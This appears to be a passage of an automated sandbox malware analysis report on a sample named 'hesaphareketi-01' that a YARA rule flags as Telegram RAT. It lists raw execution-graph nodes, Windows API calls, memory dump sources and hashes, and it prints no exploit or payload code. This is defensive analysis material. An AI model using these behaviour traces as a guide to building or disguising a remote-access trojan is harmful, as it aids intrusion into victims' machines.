                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3677180762.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:false

                                                  Execution Graph

                                                  Execution Coverage:6.2%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:27.3%
                                                  Total number of Nodes:961
                                                  Total number of Limit Nodes:15
                                                  execution_graph: raw node/edge data of the interactive Execution Graph (961 nodes, 15 limit nodes). API calls referenced along the graph include VirtualAlloc, VirtualFree, FlsAlloc, FlsGetValue, FlsSetValue, RaiseFailFastException, RaiseException, CoInitializeEx, WaitForSingleObject, WaitForSingleObjectEx, SetEvent, GetStdHandle, WriteFile, GetLastError, SetLastError, GetCurrentThreadId, malloc, RtlPcToFileHeader, DebugBreak, GetTickCount64, SwitchToThread, Sleep, SleepEx, GetCurrentProcess, GlobalMemoryStatusEx, IsProcessorFeaturePresent, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess, GetModuleHandleExW, RtlAddVectoredExceptionHandler, GetProcessAffinityMask, QueryInformationJobObject, InitializeCriticalSectionEx, GetSystemTimeAsFileTime, EventRegister, _wcsicmp and LoadLibraryExW.
17469->17470 17471 7ff7341d9b0e 17470->17471 17471->17343 17472->17469 17474 7ff7341d9b90 17473->17474 17475 7ff7341dd5c0 9 API calls 17474->17475 17476 7ff7341d9ca8 17475->17476 17477 7ff734238e50 8 API calls 17476->17477 17478 7ff7341d9cc0 17477->17478 17478->17367 17480 7ff7341db220 InitializeCriticalSectionEx 17479->17480 17481 7ff7341dfc1c 17480->17481 17481->17283 17483 7ff734238e70 _swprintf_c_l 3 API calls 17482->17483 17484 7ff7341d4bde 17483->17484 17485 7ff7341db220 InitializeCriticalSectionEx 17484->17485 17486 7ff7341d4c10 17484->17486 17485->17486 17487 7ff7341d4c68 ISource 17486->17487 17496 7ff7341db200 17486->17496 17487->17294 17490 7ff7341d4cb5 17489->17490 17492 7ff7341d4cc6 ISource 17489->17492 17491 7ff7341db200 DeleteCriticalSection 17490->17491 17491->17492 17492->17297 17494 7ff7341db200 17493->17494 17494->17299 17495 7ff73423889b DeleteCriticalSection 17494->17495 17496->17487 17497 7ff73423889b DeleteCriticalSection 17496->17497 17533 7ff7341e1b70 17498->17533 17500 7ff7341d9e47 17500->17316 17501 7ff7341e8f50 17500->17501 17502 7ff7341dde30 4 API calls 17501->17502 17503 7ff7341e8f69 17502->17503 17544 7ff7341e26b0 QueryPerformanceFrequency 17503->17544 17505 7ff7341e8f6e 17508 7ff7341e8fe9 17505->17508 17545 7ff7341e2070 17505->17545 17507 7ff7341e925b ISource 17507->17317 17508->17507 17559 7ff7341ff450 17508->17559 17510 7ff7341e945c 17510->17507 17511 7ff734238e70 _swprintf_c_l 3 API calls 17510->17511 17512 7ff7341e9592 17511->17512 17512->17507 17582 7ff7341e1cc0 17512->17582 17514 7ff7341e95bd 17587 7ff7341fdc30 17514->17587 17517 7ff7341d67d2 17516->17517 17518 7ff7341d680d 17517->17518 17750 7ff7341dfa80 CreateEventW 17517->17750 17518->17319 17520 7ff7341d67e4 17520->17518 17751 7ff7341db130 CreateThread 17520->17751 17522 7ff7341d6803 17522->17319 17524 7ff7341de7f7 17523->17524 17525 7ff7341de7ff 17524->17525 17526 7ff734238e70 _swprintf_c_l 3 API calls 17524->17526 17525->17320 17530 7ff7341de831 17526->17530 17527 
7ff7341de968 ISource 17527->17320 17529 7ff7341de902 ISource 17529->17320 17530->17527 17531 7ff7341de8c5 ISource 17530->17531 17754 7ff7341e4160 17530->17754 17531->17529 17760 7ff7341e43f0 17531->17760 17538 7ff7341e4a30 17533->17538 17536 7ff7341e1baf 17536->17500 17539 7ff734238e70 _swprintf_c_l 3 API calls 17538->17539 17540 7ff7341e1b98 17539->17540 17540->17536 17541 7ff7341e6580 17540->17541 17542 7ff734238e70 _swprintf_c_l 3 API calls 17541->17542 17543 7ff7341e6595 17542->17543 17543->17536 17544->17505 17546 7ff7341e2093 17545->17546 17547 7ff7341e21e4 17546->17547 17548 7ff7341e20a7 GetCurrentProcess IsProcessInJob 17546->17548 17551 7ff7341e2232 GlobalMemoryStatusEx 17547->17551 17552 7ff7341e2228 17547->17552 17549 7ff7341e21a3 17548->17549 17550 7ff7341e20fc 17548->17550 17549->17547 17554 7ff7341e21bb GlobalMemoryStatusEx 17549->17554 17550->17549 17553 7ff7341e2106 QueryInformationJobObject 17550->17553 17551->17552 17556 7ff734238e50 8 API calls 17552->17556 17553->17549 17555 7ff7341e2128 17553->17555 17554->17547 17555->17549 17558 7ff7341e216c GlobalMemoryStatusEx 17555->17558 17557 7ff7341e2274 17556->17557 17557->17508 17558->17549 17610 7ff7341e2700 VirtualAlloc 17559->17610 17561 7ff7341ff472 17562 7ff7341ff4d7 17561->17562 17686 7ff7341e24a0 InitializeCriticalSection 17561->17686 17563 7ff7341ff8cd 17562->17563 17613 7ff734210220 17562->17613 17566 7ff7341ff501 _swprintf_c_l 17581 7ff7341ff743 17566->17581 17623 7ff7341ff150 17566->17623 17568 7ff7341ff6d8 17627 7ff7341fcc20 17568->17627 17572 7ff7341ff712 17572->17581 17634 7ff7341ff8f0 17572->17634 17575 7ff7341ff738 17687 7ff7341e27f0 VirtualFree 17575->17687 17577 7ff7341ff767 17577->17581 17648 7ff734212eb0 17577->17648 17581->17510 17583 7ff734238e70 _swprintf_c_l 3 API calls 17582->17583 17584 7ff7341e1ce6 17583->17584 17585 7ff7341e1cee CreateEventW 17584->17585 17586 7ff7341e1d10 ISource 17584->17586 17585->17586 17586->17514 17588 7ff7341fdcba _swprintf_c_l 17587->17588 17589 
7ff7341e1cc0 4 API calls 17588->17589 17590 7ff7341fdcc8 17589->17590 17600 7ff7341fe527 17590->17600 17728 7ff7341e2690 QueryPerformanceCounter 17590->17728 17593 7ff7341fdce6 17594 7ff7341fe056 17593->17594 17593->17600 17729 7ff734201470 17593->17729 17595 7ff734201470 9 API calls 17594->17595 17596 7ff7341fe089 17595->17596 17597 7ff734201470 9 API calls 17596->17597 17596->17600 17598 7ff7341fe0c8 17597->17598 17599 7ff734238e70 _swprintf_c_l 3 API calls 17598->17599 17598->17600 17601 7ff7341fe391 17599->17601 17600->17507 17601->17600 17602 7ff7341fe3f4 17601->17602 17603 7ff7341fe3dd 17601->17603 17604 7ff734238e70 _swprintf_c_l 3 API calls 17602->17604 17603->17600 17605 7ff7341fe3ea DebugBreak 17603->17605 17606 7ff7341fe440 17604->17606 17605->17600 17606->17600 17607 7ff734238e70 _swprintf_c_l 3 API calls 17606->17607 17608 7ff7341fe4cd 17607->17608 17608->17600 17743 7ff7341e24a0 InitializeCriticalSection 17608->17743 17611 7ff7341e2721 VirtualFree 17610->17611 17612 7ff7341e2739 17610->17612 17611->17561 17612->17561 17616 7ff73421024f 17613->17616 17614 7ff73421027c 17618 7ff7341e2810 3 API calls 17614->17618 17615 7ff734210272 17688 7ff7341e2890 17615->17688 17616->17614 17616->17615 17621 7ff7342102a7 17616->17621 17620 7ff73421028d 17618->17620 17620->17621 17699 7ff7341e27f0 VirtualFree 17620->17699 17621->17566 17625 7ff7341ff16f 17623->17625 17626 7ff7341ff18c 17625->17626 17700 7ff7341e1d80 17625->17700 17626->17568 17628 7ff7341fcc42 17627->17628 17629 7ff734238e50 8 API calls 17628->17629 17630 7ff7341fcd63 17629->17630 17631 7ff7341e2810 17630->17631 17632 7ff7341e2854 GetCurrentProcess VirtualAllocExNuma 17631->17632 17633 7ff7341e2835 VirtualAlloc 17631->17633 17632->17572 17633->17632 17635 7ff7341ff91e 17634->17635 17636 7ff7341ff928 17635->17636 17639 7ff7341ffcd3 EnterCriticalSection 17635->17639 17640 7ff7341ffd00 LeaveCriticalSection 17635->17640 17642 7ff7341ffdf1 LeaveCriticalSection 17635->17642 17643 7ff7341ffdc7 17635->17643 
17707 7ff7341e2740 17635->17707 17637 7ff734238e50 8 API calls 17636->17637 17638 7ff7341ff734 17637->17638 17638->17575 17638->17577 17639->17635 17639->17640 17640->17635 17645 7ff7341ffdfd 17642->17645 17644 7ff7341ffdd0 EnterCriticalSection 17643->17644 17643->17645 17644->17642 17645->17636 17647 7ff7341ffe35 EnterCriticalSection LeaveCriticalSection 17645->17647 17710 7ff7341e27d0 VirtualFree 17645->17710 17647->17645 17711 7ff734212dc0 17648->17711 17651 7ff7341feb10 17652 7ff7341feb40 17651->17652 17653 7ff7341feb9f 17652->17653 17660 7ff7341e1cc0 4 API calls 17652->17660 17654 7ff7341ff121 17653->17654 17655 7ff7341ff12d 17653->17655 17685 7ff7341ff087 17653->17685 17726 7ff7341e1c20 CloseHandle 17654->17726 17657 7ff7341ff136 17655->17657 17658 7ff7341ff142 17655->17658 17727 7ff7341e1c20 CloseHandle 17657->17727 17658->17581 17661 7ff7341febdf 17660->17661 17661->17653 17662 7ff7341e1cc0 4 API calls 17661->17662 17663 7ff7341febf5 _swprintf_c_l 17662->17663 17663->17653 17664 7ff7341e1e90 10 API calls 17663->17664 17665 7ff7341fef1a 17664->17665 17666 7ff7341e1cc0 4 API calls 17665->17666 17667 7ff7341fef97 17666->17667 17668 7ff7341fefd9 17667->17668 17671 7ff7341e1cc0 4 API calls 17667->17671 17668->17653 17669 7ff7341ff0cd 17668->17669 17670 7ff7341ff0d9 17668->17670 17722 7ff7341e1c20 CloseHandle 17669->17722 17673 7ff7341ff0e2 17670->17673 17674 7ff7341ff0ee 17670->17674 17675 7ff7341fefad 17671->17675 17723 7ff7341e1c20 CloseHandle 17673->17723 17677 7ff7341ff103 17674->17677 17678 7ff7341ff0f7 17674->17678 17675->17668 17717 7ff7341e1c40 17675->17717 17677->17653 17680 7ff7341ff10c 17677->17680 17724 7ff7341e1c20 CloseHandle 17678->17724 17725 7ff7341e1c20 CloseHandle 17680->17725 17682 7ff7341fefc3 17682->17668 17684 7ff7341e1cc0 4 API calls 17682->17684 17684->17668 17685->17581 17686->17562 17687->17581 17689 7ff7341e2956 GetLargePageMinimum 17688->17689 17690 7ff7341e28be LookupPrivilegeValueW 17688->17690 17692 7ff7341e2993 GetCurrentProcess 
VirtualAllocExNuma 17689->17692 17693 7ff7341e2976 VirtualAlloc 17689->17693 17691 7ff7341e28da GetCurrentProcess OpenProcessToken 17690->17691 17695 7ff7341e298f 17690->17695 17694 7ff7341e2911 AdjustTokenPrivileges GetLastError CloseHandle 17691->17694 17691->17695 17692->17695 17693->17695 17694->17695 17696 7ff7341e294b 17694->17696 17697 7ff734238e50 8 API calls 17695->17697 17696->17689 17696->17695 17698 7ff7341e29c6 17697->17698 17698->17620 17699->17621 17701 7ff7341e1d88 17700->17701 17702 7ff7341e1da1 GetLogicalProcessorInformation 17701->17702 17706 7ff7341e1dcd ISource 17701->17706 17703 7ff7341e1dd4 17702->17703 17704 7ff7341e1dc2 GetLastError 17702->17704 17705 7ff7341e1e11 GetLogicalProcessorInformation 17703->17705 17703->17706 17704->17703 17704->17706 17705->17706 17706->17626 17708 7ff7341e275b VirtualAlloc 17707->17708 17709 7ff7341e277e GetCurrentProcess VirtualAllocExNuma 17707->17709 17708->17635 17709->17635 17710->17645 17712 7ff734212dd9 17711->17712 17714 7ff7341ff8ac 17711->17714 17713 7ff734212df4 LoadLibraryExW 17712->17713 17712->17714 17713->17714 17715 7ff734212e22 GetProcAddress 17713->17715 17714->17651 17716 7ff734212e37 17715->17716 17716->17714 17718 7ff734238e70 _swprintf_c_l 3 API calls 17717->17718 17719 7ff7341e1c66 17718->17719 17720 7ff7341e1c6e CreateEventW 17719->17720 17721 7ff7341e1c8e ISource 17719->17721 17720->17721 17721->17682 17722->17670 17723->17674 17724->17677 17725->17653 17726->17655 17727->17658 17728->17593 17730 7ff73420149d 17729->17730 17731 7ff7342014f3 EnterCriticalSection 17730->17731 17732 7ff734201577 17730->17732 17733 7ff734201510 17731->17733 17735 7ff7342015d1 17732->17735 17737 7ff7341e2740 3 API calls 17732->17737 17734 7ff7342015c1 LeaveCriticalSection 17733->17734 17736 7ff734201555 LeaveCriticalSection 17733->17736 17738 7ff7342015cd 17734->17738 17744 7ff7341fe5b0 17735->17744 17736->17732 17740 7ff73420159d 17737->17740 17738->17593 17740->17735 17741 7ff7342015a1 17740->17741 
17741->17738 17742 7ff7342015ab EnterCriticalSection 17741->17742 17742->17734 17743->17600 17745 7ff7341fe5e1 17744->17745 17746 7ff7341fe775 17745->17746 17747 7ff7341fe764 17745->17747 17748 7ff7341fe75f DebugBreak 17745->17748 17746->17738 17747->17746 17749 7ff7341fe770 DebugBreak 17747->17749 17748->17747 17749->17746 17750->17520 17752 7ff7341db165 SetThreadPriority ResumeThread FindCloseChangeNotification 17751->17752 17753 7ff7341db15f 17751->17753 17752->17522 17753->17522 17755 7ff7341e4193 _swprintf_c_l 17754->17755 17759 7ff7341e41b9 ISource _swprintf_c_l 17755->17759 17763 7ff7341e5110 17755->17763 17757 7ff7341e41b0 17758 7ff7341db220 InitializeCriticalSectionEx 17757->17758 17757->17759 17758->17759 17759->17530 17759->17759 17761 7ff7341db200 DeleteCriticalSection 17760->17761 17762 7ff7341e4402 17761->17762 17764 7ff7341e2810 3 API calls 17763->17764 17765 7ff7341e5132 17764->17765 17766 7ff7341e513a 17765->17766 17767 7ff7341e2740 3 API calls 17765->17767 17766->17757 17768 7ff7341e5158 17767->17768 17771 7ff7341e5163 _swprintf_c_l 17768->17771 17772 7ff7341e27f0 VirtualFree 17768->17772 17770 7ff7341e527e 17770->17757 17771->17757 17772->17770 17774 7ff7341db013 17773->17774 17775 7ff7341daffe GetProcAddress 17773->17775 17774->17335 17775->17774 17777 7ff7341dafae GetProcAddress 17776->17777 17778 7ff7341dafc3 17776->17778 17777->17778 17778->17337 17797 7ff7341d2310 17799 7ff7341d2320 17797->17799 17798 7ff7341d2359 17799->17798 17800 7ff7341d25d0 17 API calls 17799->17800 17801 7ff73428c971 17800->17801 17802 7ff7341e8412 17803 7ff7341e8418 17802->17803 17826 7ff7341f9230 17803->17826 17806 7ff7341e8454 17830 7ff7341e2690 QueryPerformanceCounter 17806->17830 17809 7ff7341e8472 17831 7ff7341da2e0 17809->17831 17812 7ff7341e85b5 17818 7ff7341e84d5 17812->17818 17847 7ff7341f9f60 17812->17847 17815 7ff7341e85fa 17815->17818 17868 7ff7341fd760 17815->17868 17817 7ff7341e87e0 17819 7ff7341f9230 SwitchToThread 17817->17819 17818->17817 17823 
7ff7341e8764 17818->17823 17876 7ff7341e2690 QueryPerformanceCounter 17818->17876 17821 7ff7341e87eb 17819->17821 17825 7ff7341e880e 17821->17825 17885 7ff7341e26e0 SetEvent 17821->17885 17877 7ff7341d9f80 17823->17877 17827 7ff7341e8436 17826->17827 17829 7ff7341f924f 17826->17829 17827->17806 17841 7ff7341e26d0 ResetEvent 17827->17841 17828 7ff7341f9291 SwitchToThread 17828->17829 17829->17827 17829->17828 17830->17809 17832 7ff7341da2f5 17831->17832 17836 7ff7341da358 17832->17836 17894 7ff7341dac10 EventEnabled 17832->17894 17834 7ff7341da32f 17834->17836 17895 7ff7341da4a0 EventWrite 17834->17895 17886 7ff7341d4fa0 17836->17886 17839 7ff7341da3ac 17839->17812 17839->17818 17842 7ff7341f9460 17839->17842 17845 7ff7341f9480 17842->17845 17843 7ff7341fd760 11 API calls 17843->17845 17844 7ff7341f94ea 17844->17812 17845->17843 17845->17844 17913 7ff7341fd010 17845->17913 17852 7ff7341f9f75 17847->17852 17848 7ff7341f9f79 17848->17815 17849 7ff7341fa05d 17850 7ff7341ed020 24 API calls 17849->17850 17851 7ff7341fa06f 17850->17851 17851->17848 17857 7ff7341f3d20 7 API calls 17851->17857 17860 7ff7341fa110 17851->17860 17852->17848 17852->17849 17853 7ff7341fa074 17852->17853 17854 7ff7341fe5b0 2 API calls 17853->17854 17855 7ff7341fa09a 17854->17855 17855->17851 17856 7ff7341fa0b1 EnterCriticalSection LeaveCriticalSection 17855->17856 17856->17851 17859 7ff7341fa0f6 17857->17859 17858 7ff7341fa1b8 DebugBreak 17862 7ff7341fa1c7 17858->17862 17859->17860 17861 7ff7341fa0fa 17859->17861 17860->17858 17863 7ff7341fa17b DebugBreak 17860->17863 17865 7ff7341fa198 DebugBreak 17860->17865 17867 7ff7341fa1af 17860->17867 17864 7ff7341f64a0 5 API calls 17861->17864 17862->17848 17866 7ff7341fa1db DebugBreak 17862->17866 17863->17860 17864->17848 17865->17860 17866->17848 17867->17858 17867->17862 17870 7ff7341fd776 17868->17870 17869 7ff7341fd7a7 17869->17818 17870->17869 17871 7ff7341fd810 17870->17871 17872 7ff7341dde30 4 API calls 17870->17872 17997 7ff7342102e0 
17871->17997 17872->17871 17875 7ff7341dde30 4 API calls 17875->17869 17876->17823 17878 7ff7341d9f8d 17877->17878 17883 7ff7341d9fbf 17877->17883 18008 7ff7341dac10 EventEnabled 17878->18008 17880 7ff7341d9fa0 17880->17883 18009 7ff7341da450 EventWrite 17880->18009 17882 7ff7341da00e 17882->17817 17883->17882 18012 7ff7341dac10 EventEnabled 17883->18012 17887 7ff7341d4fdf 17886->17887 17888 7ff7341d5004 FlushProcessWriteBuffers 17887->17888 17893 7ff7341d5030 17888->17893 17889 7ff7341d5103 17889->17839 17898 7ff7341dac10 EventEnabled 17889->17898 17890 7ff7341d5069 17890->17893 17899 7ff7341d5d00 17890->17899 17891 7ff7341d509e SwitchToThread 17891->17893 17893->17889 17893->17890 17893->17891 17893->17893 17894->17834 17896 7ff734238e50 8 API calls 17895->17896 17897 7ff7341da50a 17896->17897 17897->17836 17898->17839 17900 7ff7341d5d27 17899->17900 17901 7ff7341d5d07 17899->17901 17900->17890 17901->17900 17902 7ff7341dad32 LoadLibraryExW GetProcAddress 17901->17902 17910 7ff7341dad5e 17901->17910 17902->17910 17903 7ff7341dadba SuspendThread 17904 7ff7341dae08 17903->17904 17905 7ff7341dadc8 GetThreadContext 17903->17905 17907 7ff734238e50 8 API calls 17904->17907 17906 7ff7341dadff ResumeThread 17905->17906 17908 7ff7341dade2 17905->17908 17906->17904 17909 7ff7341dae18 17907->17909 17908->17906 17909->17890 17910->17903 17910->17904 17911 7ff7341dada4 GetLastError 17910->17911 17911->17904 17912 7ff7341dadaf 17911->17912 17912->17903 17923 7ff7341fceb0 17913->17923 17915 7ff7341fd021 17916 7ff7341fd106 DebugBreak 17915->17916 17917 7ff7341fd0c9 DebugBreak 17915->17917 17918 7ff7341fd0e6 DebugBreak 17915->17918 17920 7ff7341fd138 17915->17920 17921 7ff7341fd0fd 17915->17921 17919 7ff7341fd115 17916->17919 17917->17915 17918->17915 17919->17920 17922 7ff7341fd129 DebugBreak 17919->17922 17920->17845 17921->17916 17921->17919 17922->17920 17927 7ff7341fced2 17923->17927 17924 7ff7341fcf25 17934 7ff7341ed020 17924->17934 17926 7ff7341fcf40 17928 7ff7341fe5b0 2 
API calls 17926->17928 17927->17924 17927->17926 17930 7ff7341fcf62 17928->17930 17929 7ff7341fcff5 17929->17915 17932 7ff7341fcfb2 EnterCriticalSection LeaveCriticalSection 17930->17932 17933 7ff7341fcf38 17930->17933 17932->17933 17933->17929 17941 7ff7341ff360 17933->17941 17935 7ff7341ed049 17934->17935 17937 7ff7341ed177 17935->17937 17960 7ff734204a40 17935->17960 17938 7ff7341ed2ff 17937->17938 17939 7ff734201470 9 API calls 17937->17939 17938->17933 17940 7ff7341ed326 17939->17940 17940->17933 17942 7ff7341ff415 17941->17942 17943 7ff7341ff379 17941->17943 17942->17929 17964 7ff7341f3d20 17943->17964 17945 7ff7341ff3fb 17947 7ff7341f64a0 5 API calls 17945->17947 17949 7ff7341ff408 17947->17949 17948 7ff7341ff39c 17950 7ff7341ff3a1 17948->17950 17951 7ff7341ff3de 17948->17951 17949->17929 17952 7ff7341ff3a6 17950->17952 17953 7ff7341ff3c1 17950->17953 17954 7ff7341f64a0 5 API calls 17951->17954 17970 7ff7341f64a0 17952->17970 17956 7ff7341f64a0 5 API calls 17953->17956 17957 7ff7341ff3ee 17954->17957 17959 7ff7341ff3d1 17956->17959 17957->17929 17958 7ff7341ff3b4 17958->17929 17959->17929 17962 7ff734204a59 17960->17962 17963 7ff734204aa4 17960->17963 17961 7ff7341ff8f0 18 API calls 17961->17962 17962->17961 17962->17963 17963->17937 17965 7ff7341f3de4 17964->17965 17966 7ff7341f3d60 17964->17966 17965->17942 17965->17945 17965->17948 17966->17965 17978 7ff7341f3c20 17966->17978 17969 7ff7341f3c20 7 API calls 17969->17965 17971 7ff7341f64d7 17970->17971 17973 7ff7341f64f9 _swprintf_c_l 17971->17973 17988 7ff734210440 17971->17988 17974 7ff7341f65e0 17973->17974 17995 7ff7341e27d0 VirtualFree 17973->17995 17974->17958 17976 7ff7341f65a5 17976->17974 17977 7ff7341f65b3 EnterCriticalSection LeaveCriticalSection 17976->17977 17977->17974 17979 7ff7341f3c63 EnterCriticalSection 17978->17979 17980 7ff7341f3cb1 17978->17980 17981 7ff7341f3c80 17979->17981 17982 7ff7341f3c8d LeaveCriticalSection 17979->17982 17983 7ff7341e2740 3 API calls 17980->17983 17981->17982 
17984 7ff7341f3cf1 LeaveCriticalSection 17981->17984 17982->17980 17985 7ff7341f3cc2 17983->17985 17986 7ff7341f3cfd 17984->17986 17985->17986 17987 7ff7341f3cd0 EnterCriticalSection 17985->17987 17986->17965 17986->17969 17987->17984 17996 7ff7341e27d0 VirtualFree 17988->17996 17990 7ff73421045a 17991 7ff7342104a4 17990->17991 17992 7ff73421046b EnterCriticalSection 17990->17992 17991->17973 17993 7ff73421048e 17992->17993 17994 7ff734210495 LeaveCriticalSection 17992->17994 17993->17994 17994->17991 17995->17976 17996->17990 17998 7ff734210319 EnterCriticalSection 17997->17998 18004 7ff7342103a5 17997->18004 18000 7ff734210339 LeaveCriticalSection 17998->18000 17999 7ff7341e2740 3 API calls 18002 7ff7342103d6 17999->18002 18000->18004 18001 7ff7341fd839 18001->17869 18001->17875 18002->18001 18005 7ff7342103e7 EnterCriticalSection 18002->18005 18004->17999 18004->18001 18006 7ff73421040d LeaveCriticalSection 18005->18006 18007 7ff734210406 18005->18007 18006->18001 18007->18006 18008->17880 18010 7ff734238e50 8 API calls 18009->18010 18011 7ff7341da499 18010->18011 18011->17883 18012->17882 17779 7ff734200560 17780 7ff73420059d 17779->17780 17782 7ff7342005c7 17779->17782 17781 7ff7341e1e90 10 API calls 17780->17781 17781->17782 18013 7ff7341da5b1 18014 7ff7341da584 18013->18014 18015 7ff7341da5c3 18013->18015 18018 7ff7341e725e 61 API calls 18015->18018 18019 7ff7341e73e1 18015->18019 18016 7ff7341da5e4 18018->18016 18020 7ff7341e73c0 18019->18020 18021 7ff7341e9c50 3 API calls 18020->18021 18022 7ff7341e72a9 18020->18022 18021->18022 18022->18016 18023 7ff7341edd6b 18026 7ff73420e890 18023->18026 18025 7ff7341edd43 18029 7ff7341eaa00 18026->18029 18028 7ff73420e8c8 18028->18025 18030 7ff7341eaa57 18029->18030 18031 7ff7341eae0a 18030->18031 18037 7ff73420e700 18030->18037 18031->18028 18033 7ff7341eab55 _swprintf_c_l 18035 7ff7341ead41 18033->18035 18045 7ff734201650 18033->18045 18035->18031 18049 7ff7341f2490 18035->18049 18038 7ff73420e719 18037->18038 18040 
7ff73420e729 18037->18040 18038->18033 18039 7ff73420e85b SwitchToThread 18039->18040 18040->18039 18041 7ff73420e779 SwitchToThread 18040->18041 18042 7ff73420e867 18040->18042 18043 7ff73420e82c SwitchToThread 18040->18043 18044 7ff73420e817 SwitchToThread 18040->18044 18041->18040 18042->18033 18043->18040 18044->18040 18046 7ff73420166f 18045->18046 18048 7ff7342016da _swprintf_c_l 18045->18048 18046->18048 18054 7ff7341e29e0 VirtualAlloc 18046->18054 18048->18035 18050 7ff734201650 2 API calls 18049->18050 18052 7ff7341f24c5 _swprintf_c_l 18050->18052 18051 7ff73420e700 4 API calls 18053 7ff7341f2615 18051->18053 18052->18051 18053->18031 18053->18053 18055 7ff7341e2a2c 18054->18055 18056 7ff7341e2a1b 18054->18056 18055->18048 18056->18055 18057 7ff7341e2a20 VirtualUnlock 18056->18057 18057->18055 18058 7ff7341eaf28 18059 7ff7341eaf2d 18058->18059 18060 7ff7341eaf80 18058->18060 18061 7ff73420e700 4 API calls 18059->18061 18062 7ff7341fd760 11 API calls 18060->18062 18063 7ff7341eb02a 18061->18063 18062->18059 18064 7ff734201650 2 API calls 18063->18064 18065 7ff7341eb055 18063->18065 18064->18065 18066 7ff7341f2490 6 API calls 18065->18066 18067 7ff7341eb0c0 18066->18067

                                                  Control-flow Graph

                                                  APIs
                                                  • GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF7341DAE5A), ref: 00007FF7341E24CF
                                                  • GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF7341DAE5A), ref: 00007FF7341E250D
                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7341DAE5A), ref: 00007FF7341E2539
                                                  • GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF7341DAE5A), ref: 00007FF7341E254A
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7341DAE5A), ref: 00007FF7341E2559
                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7341DAE5A), ref: 00007FF7341E25F0
                                                  • GetProcessAffinityMask.KERNEL32 ref: 00007FF7341E2603
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$AffinityCurrent$ErrorGroupHighestInfoLastMaskNodeNumaNumberSystem
                                                  • String ID:
                                                  • API String ID: 580471860-0
                                                  • Opcode ID: 7ecf9e13a330afa06f8beef30d834f864ee4498cc9ed1855e1d3942379770bb5
                                                  • Instruction ID: e74fc069819647aab8a0543d82e5867069567662c2925c9d2a9e32697ef8746e
                                                  • Opcode Fuzzy Hash: 7ecf9e13a330afa06f8beef30d834f864ee4498cc9ed1855e1d3942379770bb5
                                                  • Instruction Fuzzy Hash: E7517C76A08B46A7EE48EF16B5901B9E3A1AF49B80FC40135D94DD7364EE3CE444E724

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00007FF7341DAE30: FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF7341D55CB), ref: 00007FF7341DAE3B
                                                    • Part of subcall function 00007FF7341DAE30: QueryInformationJobObject.KERNEL32 ref: 00007FF7341DAF0E
                                                    • Part of subcall function 00007FF7341DACD0: GetModuleHandleExW.KERNEL32(?,?,?,?,00007FF7341D3699), ref: 00007FF7341DACE1
                                                  • RtlAddVectoredExceptionHandler.NTDLL ref: 00007FF7341D5638
                                                    • Part of subcall function 00007FF7341DD5C0: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7341DD6BD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocExceptionHandleHandlerInformationModuleObjectQueryVectored_wcsicmp
                                                  • String ID: StressLogLevel$TotalStressLogSize
                                                  • API String ID: 2876344857-4058818204
                                                  • Opcode ID: 45dc59bb53227d1381efa592a7d616e654f0d65a7567b6ffba862109cea427b1
                                                  • Instruction ID: ddb7887fad6571bbf4334c59342f9f1e72e89a434e2aac3e17a0ffde31bb7621
                                                  • Opcode Fuzzy Hash: 45dc59bb53227d1381efa592a7d616e654f0d65a7567b6ffba862109cea427b1
                                                  • Instruction Fuzzy Hash: 5041B6B3908E42A1EE48BF26B4C12B9E391EF82784FC40035E94D9769ADE3CE505D760

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
